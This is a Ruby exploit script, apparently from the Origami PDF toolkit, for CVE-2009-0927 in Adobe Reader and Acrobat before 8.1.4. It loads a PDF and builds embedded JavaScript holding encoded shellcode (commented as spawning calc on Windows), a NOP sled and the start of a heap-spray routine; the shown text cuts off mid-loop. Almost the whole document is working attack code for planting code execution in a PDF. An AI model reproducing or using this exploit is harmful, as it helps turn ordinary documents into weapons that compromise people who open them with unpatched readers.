#!/usr/bin/env ruby # # References: # CVE 2009-0927 # http://www.securityfocus.com/bid/34169 # http://www.zerodayinitiative.com/advisories/ZDI-09-014/ # # Vulnerable: Adobe Reader and Adobe Acrobat Professional < 8.1.4 # # This exploit / PoC spawns a calc on Windows. # # begin require 'origami' rescue LoadError ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib" $: << ORIGAMIDIR require 'origami' end include Origami pdf = PDF.read(ARGV[0]) jscript = %Q| function spary() { var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98\ bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0\ ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8\ c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580"); //shellcode = unescape("%u7dbf%uca55%u2ba7%udbc9%ub1d3%ud914%u2474%u5bf4%ueb83%u31fc%u0e7b%u7b03%u9f0e%ufba0%ua87c%uafa8%u05c1%u5245%u484f%u3429%u0a82%ue711%u624e%u1559%u2e7e%u0acf%u9ed1%uca86%u78bb%uc1c1%u0dbc%uddb0%u090f%ub883%u91a2%uf4a0%u5c5b%u66a6%u34fa%ud098%u4830%u99af%u2032%u751f%ud8b0%ua637%u7154%u31a6%ud17b%ucb65%u619d%u0682%u41dd"); garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\ 90%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\ 90%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\ 90%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u90\ 90%u9090%u9090%u9090") + shellcode; nopblock = unescape("%u9090%u9090"); headersize = 10; acl = headersize+garbage.length; while (nopblock.length